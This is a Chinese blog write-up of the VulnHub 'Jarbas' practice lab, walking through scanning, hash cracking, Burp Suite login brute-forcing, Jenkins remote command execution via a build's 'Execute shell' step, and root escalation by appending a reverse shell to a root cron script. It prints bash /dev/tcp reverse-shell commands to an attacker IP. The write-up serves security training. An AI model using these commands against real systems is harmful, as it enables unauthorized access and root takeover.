代码编织梦想

靶场考察点

1.Jenkis平台的漏洞利用

Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件项目可以进行持续集成


2.contrab提权

在LINUX系统中的/etc/contrab文件存放着系统定时任务, 若该文件的某些定时任务指定由root用户执行, 那么这将是一个可提权点


3.登录爆破

使用burpsuite对网站后台登录进行爆破


靶场搭建

Jarbas靶场下载地址: https://download.vulnhub.com/jarbas/Jarbas.zip


渗透步骤

信息收集

1.确定靶机ip

扫描C段ip的存活主机: nmap -sn 192.168.47.0/24, 确定目标主机的IP为192.168.47.156

image-20221124230218824


2.端口扫描

分别使用tcp和udp扫描目标主机的开放端口, 显示开放的端口有228033068080

nmap -p- 192.168.47.156
nmap -sU -V -p22,80,3306,8080 192.168.47.156

image-20221124233435735

image-20221124233440334


nmap使用web漏扫脚本进行扫描, 扫描结果并不太理想, 显示在8080端口处有一个robots.txt

nmap --script=vuln -p21,22,80,3306 192.168.47.156

image-20221124233935822


访问robots.txt, 页面信息为"我们不想机器人去点击’建立’连接", 作者不想"build"被点击, 那么这个"build"后续很可能会出现且可利用

image-20221125090817640


访问http://192.168.47.156:8080, 显示登录页面, 可用于后续的爆破

image-20221125093938352


3.目录爆破

对http://192.168.47.156:80进行目录爆破, 爆出access.html

python3 dirsearch.py -u http://192.168.47.156 -x 403

image-20221125091907048


访问http://192.168.47.156:80/access.html, 页面显示三段未加密字符对应MD5加密字符串,依照以往的经验这可能是用户的账号及密码

经过在线网站的破解后, 密码字符串分别为italiavipsumariana, 最终账号对应密码如下所示:

  • tiago- > italia
  • trindade -> vipus
  • eder -> mariana

1

1


使用上述的账号密码尝试登录, 全部登录失败, 后续尝试使用burpsuite打乱顺序进行爆破

1


Web渗透

1.登录爆破

使用burpsuite进行爆破, 攻击类型选择Clusterbomb, 爆破参数分别是j_usernamej_password, 爆破的字典填写上述用户的账号密码

1

1

1


从响应长度可判断出eder/marianaeder/vipsu都可能为正确的账号密码, 经过登录尝试后, 确定后者才是正确的账号密码

由后台页面可知, 这是一个Jenkins平台, 这就要考察我们对该平台漏洞利用的了解

image-20221125155317577

image-20221125155433328


2.Jenkins远程命令执行反弹shell

在Jenkins平台新建一个任务 动画


在构建栏处发现一处能够远程命令执行的地方, 选择Execute shell, 随后输入/bin/bash -i >& /dev/tcp/192.168.47.155/4444 0>&1, 该命令的作用是反弹目标主机的shell, 然后点击应用加保存

1

1


在kali监听本机的4444端口来接收反弹Shell: nc -lvp 4444, 随后点击立即构建触发上述设置的远程命令,后续在kali收到反弹的shell

通常以这种方式获取的反弹shell, 我们称之为非交互式shell

  • 交互式shell: shell等待你的输入并且执行你提交的命令, 这种模式也是大多数用户非常熟悉的
  • 非交互式shell: shell不与你进行交互,而是读取存放在文件中的命令,并且执行它们, 当它读到文件的结尾,shell也就终止了

1

image-20221125211409283


系统提权

1.收集当前用户信息

查看当前用户: whoami, 显示当前用户为jenkins

image-20221125221304286


查看当前用户权限: sudo -l, 结果显示没有任何权限

image-20221125221342646


2.crontab提权

查看系统定时任务: cat /etc/crontab, 发现有一个任务使用root用户执行shell脚本

查看shell脚本的内容: cat /etc/script/CleaningScript.sh, 发现这是一个删除日志的脚本

image-20221125222821487

image-20221125223338183


将反弹Shell的命令写入脚本文件, 这样一来就能获取root权限的反弹shell了

echo "/bin/bash -i >& /dev/tcp/192.168.47.155/4444 0>&1" >> /etc/script/CleaningScript.sh

image-20221125223530489


重新建立nc监听, 过5分钟后就能接收到反弹的root权限shell

image-20221125224814118


获取flag.txt

image-20221126000715869

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xf555er/article/details/128050103

内网之靶场之VulnStack红队(五)-爱代码爱编程

环境搭建: 外网:192.168.135.0  内网:192.168.138.0 边界机器:win7  外网:192.168.135.150  内网:192.168.138.136 账号: heart 123.com    #本地管理员用户 sun\Administrator dc123.com    #域管用户 内网机器:winserve

全!CTF靶场、渗透实战靶场总结 (适合收藏)-爱代码爱编程

CTF靶场、渗透实战靶场总结 (适合收藏) CTF靶场:CTF刷题,在校生备战CTF比赛,信安入门、提升自己、丰富简历之必备(一场比赛打出好成绩,可以让你轻松进大厂,如近期的美团杯); 渗透实战靶场:挖洞、渗透实战(web、域、横向渗透),适合实战能力需要大幅度提升的同学。 目录 ▶0x01 CTF赛事发布网站 ▶0x02 CTF在线靶场 ▶0x03

渗透靶场--vulnstack-红队评估实战(2)-爱代码爱编程

vulnstack-红队评估实战(2) 环境配置 攻击者: kali 192.168.154.129 windows 192.168.154.1 靶场: WEB:对外边界服务器 10.10.10.80 192.168.154.80 PC:域成员 192.168.154.201 10.10.10.201 DC:域控 10.10.10.10 1

渗透靶场--vulnstack-红队评估实战(4)-爱代码爱编程

vulnstack-红队评估实战(4) 环境配置 web服务器 ubuntu:ubuntu 内网192.168.183.131 外网192.168.154.137 web服务需要自己启动分别为s2-045、CVE-2017-12615、cve-2018-12613 sudo su ubuntu cd /home/ubuntu/Desktop/vulhu

一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》-爱代码爱编程

随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。   一、网络安全行业

红队笔记之渗透测试流程以及各环节技术纲要-爱代码爱编程

相比传统渗透测试,红队则更趋于真实的入侵活动,红队这个词汇最先来源于军方的红蓝对抗活动。每一步入侵操作都有着其特有的战术和技术手段,而这些战术手段在实际过程中都绝不会是完全孤立使用的,需要多个手段相互配合以此来完成最终的入侵。作为红队人员必须清楚每个步骤的目的所在。下文将简要说明渗透测试环节以及大致技术刚要,后续会将各环节涉及到的技术点不断完善起

红队渗透笔记之红队前端语言基础-爱代码爱编程

文章目录 HTML基础HTML语法常用标签介绍<!DOCTYPE>标签< head> 标签< title> 标签< body> 标签< div>标签< a> 标签HTML 文件路径文件引入绝对文件路径相对路径CSS基础CSS语法CSS 选择器CSS 元素选择器CSS id

红日内网渗透靶场1(ATK&CK红队评估实战靶场一)-爱代码爱编程

环境搭建: 官方下载地址以及实验文档如下: http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 网络拓扑 需要模拟内网和外网两个网段, Win7 虚拟机相当于网关服务器,所以需要两张网卡,一个用来向外网提供web服务,一个是通向内网。添加网络设配器如下图。 将 Win7 的网络适配器 1 设置

网络安全之渗透靶场实战详解-爱代码爱编程

0x00 环境配置 虚拟网络编辑器: Kali: 靶机: 0x01 主机发现/端口扫描 首先使用下面这条命令来发现靶机的ip地址为192.168.26.131 arp-scan -l 然后开始使用nmap进行端口和服务的发现 nmap -sV -sC -p- 192.168.26.131 经过对开放端口和服务的

网络安全实战之靶场渗透技术_kali_ma的博客-爱代码爱编程

信息收集 端口扫描 nmap找到三个开放的 TCP 端口,FTP (21)、SSH (22) 和 Python 托管的 HTTP (5000): 发现存在ftp匿名登录,使用ftp进行登录。 Flask App

红队渗透靶场之w1r3s靶场(超详细!)_henry404s的博客-爱代码爱编程

W1R3S考察知识 nmap的基本使用目录爆破工具的使用CMS漏洞的利用Linux用户的简单提权 W1R3S靶场搭建 W1R3S靶场下载地址: https://download.vulnhub.com/w1r3s/

红日内网渗透靶场5(atk&ck红队评估实战靶场五)_红日靶场5-爱代码爱编程

环境搭建: 第一次登录会提示需要更改账号密码。 win7账号密码: sun\heart 123.com sun\Administrator dc123.com ————————————————————————————

三层带防护内网红队靶场_999端口-爱代码爱编程

外网打点 外网url:http://www.moonlab.com 信息搜集 端口扫描 sudo nmap -p 21,80,999,6588,5985 -sS -sC -v -A 192.168.3.33